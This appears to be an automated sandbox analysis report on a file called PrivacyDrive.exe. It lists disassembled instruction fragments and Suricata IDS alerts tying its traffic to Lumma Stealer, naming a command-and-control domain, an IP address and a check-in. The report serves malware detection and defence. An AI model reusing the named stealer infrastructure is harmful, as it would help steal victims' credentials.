Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then jmp ecx	4_2_051DF160
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	4_2_051BF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [esi], ax	4_2_051BF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then jmp eax	4_2_051B61F2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	4_2_051B60F1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	4_2_051EA360
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	4_2_051C4390
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	4_2_051D03B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	4_2_051C83A5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	4_2_051B33DB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	4_2_051A5D10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	4_2_051CED6D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	4_2_051CED6D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_051E9C10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	4_2_051CBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	4_2_051CBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_051C8C90
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	4_2_051A4CB0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	4_2_051BDCC2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	4_2_051B0F0F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	4_2_051BAF50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_051B3FA9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	4_2_051B3FA9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then push ebx	4_2_051BDE33
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_051E7E30
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	4_2_051E7E30
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, ecx	4_2_051B3EA6
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	4_2_051C6910
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_051B399C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	4_2_051E49F0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_051D2813
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_051D2813
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	4_2_051E3870
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_051D2899
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_051D2899
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	4_2_051DA880
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	8_2_00F86013
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	8_2_00F8600C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	8_2_00F811B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	8_2_00F9D0CE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	8_2_00F92132
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	8_2_00F9D134
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_00FB12FC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	8_2_00FB12FC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_00FBC2B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_00FA429B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_00FA429B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	8_2_00FAC282
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	8_2_00FB5272
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_00FA4215
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_00FA4215
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	8_2_00FB63F2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	8_2_00F8539E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	8_2_00F98312
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	8_2_00F874E1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	8_2_00F7F4B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, 0000000Bh	8_2_00FA54B5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx ebp, word ptr [edi]	8_2_00FB0432
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	8_2_00F92403
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000744h]	8_2_00FA45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_00FA45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_00FA45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	8_2_00F925AE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_00F98582
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_00F9F577
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	8_2_00F8F6C4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	8_2_00F766B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_00F9A692
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	8_2_00F9D652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	8_2_00F9D652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_00FBB612
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	8_2_00FA076F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	8_2_00FA076F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	8_2_00F77712
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, ecx	8_2_00F858A8
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_00FB9832
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	8_2_00FB9832
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then push ebx	8_2_00F8F835
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	8_2_00F859AB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	8_2_00F859AB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	8_2_00F8C952
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	8_2_00F82911
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	8_2_00F87AF3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then jmp eax	8_2_00F87BF4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	8_2_00FBBBE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	8_2_00F90B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [esi], ax	8_2_00F90B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, eax	8_2_00F78B72
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then jmp ecx	8_2_00FB0B62
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_00FA4B4C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	8_2_00FB2B02
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	8_2_00F84DDD
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	8_2_00FA1DB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	8_2_00F99DA7
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	8_2_00F95D92
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	8_2_00FBBD62
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	8_2_00FB0EF0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	8_2_00F7BEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	8_2_00F7BEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	8_2_00FA3ED2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	8_2_00FBBED2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, dword ptr [ebp-3Ch]	8_2_00F9FEC1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_00FA4E2D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_00FB4E22
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_00FA4E18
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	8_2_00FA0E11
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_00FBBFE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	8_2_00FA3EB7
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	8_2_00FA3F33
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	8_2_0121A1E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	8_2_011DF7B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	8_2_01211100
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then jmp ecx	8_2_0120F160
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_0120314A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, eax	8_2_011D7170
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	8_2_011EF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [esi], ax	8_2_011EF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then jmp eax	8_2_011E61F2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	8_2_011E60F1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	8_2_0121A360
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	8_2_011F4390
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	8_2_012003B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	8_2_011F83A5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	8_2_011E33DB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	8_2_01202531
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	8_2_012024B5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_0121A5E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_01213420
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_0120342B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	8_2_011FF40F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_01203419
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	8_2_0120F4EE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, dword ptr [ebp-3Ch]	8_2_011FE4C2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	8_2_012024D0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	8_2_0121A4D0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	8_2_011DA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	8_2_011DA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	8_2_011FB6CC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	8_2_011FB732
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	8_2_011F0730
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	8_2_011E4611
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	8_2_011E460A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	8_2_011F6910
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	8_2_011E399C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	8_2_012149F0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_01202813
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_01202813
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	8_2_01213870
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_0121A8B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	8_2_0120A880
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_01202899
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_01202899
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_0120F8FA
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	8_2_0120F8FA
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_011FDB75
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_011F6B80
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	8_2_011F0BAC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000744h]	8_2_01202BC9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_01202BC9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_01202BC9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx ebp, word ptr [edi]	8_2_0120EA30
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	8_2_011F0A01
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, 0000000Bh	8_2_01203AB3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	8_2_011DDAB0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	8_2_011E5ADF
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	8_2_011D5D10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	8_2_011FED6D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	8_2_011FED6D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_01219C10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	8_2_011FBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	8_2_011FBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_011F8C90
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	8_2_011D4CB0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	8_2_011EDCC2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	8_2_011E0F0F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	8_2_011EAF50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	8_2_011E3FA9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	8_2_011E3FA9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_01217E30
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	8_2_01217E30
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then push ebx	8_2_011EDE33
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, ecx	8_2_011E3EA6

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.4:49748 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.4:49745 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.4:49744 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2056078 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop) : 192.168.2.4:50546 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.4:49749 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49744 -> 172.67.206.221:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 172.67.206.221:443
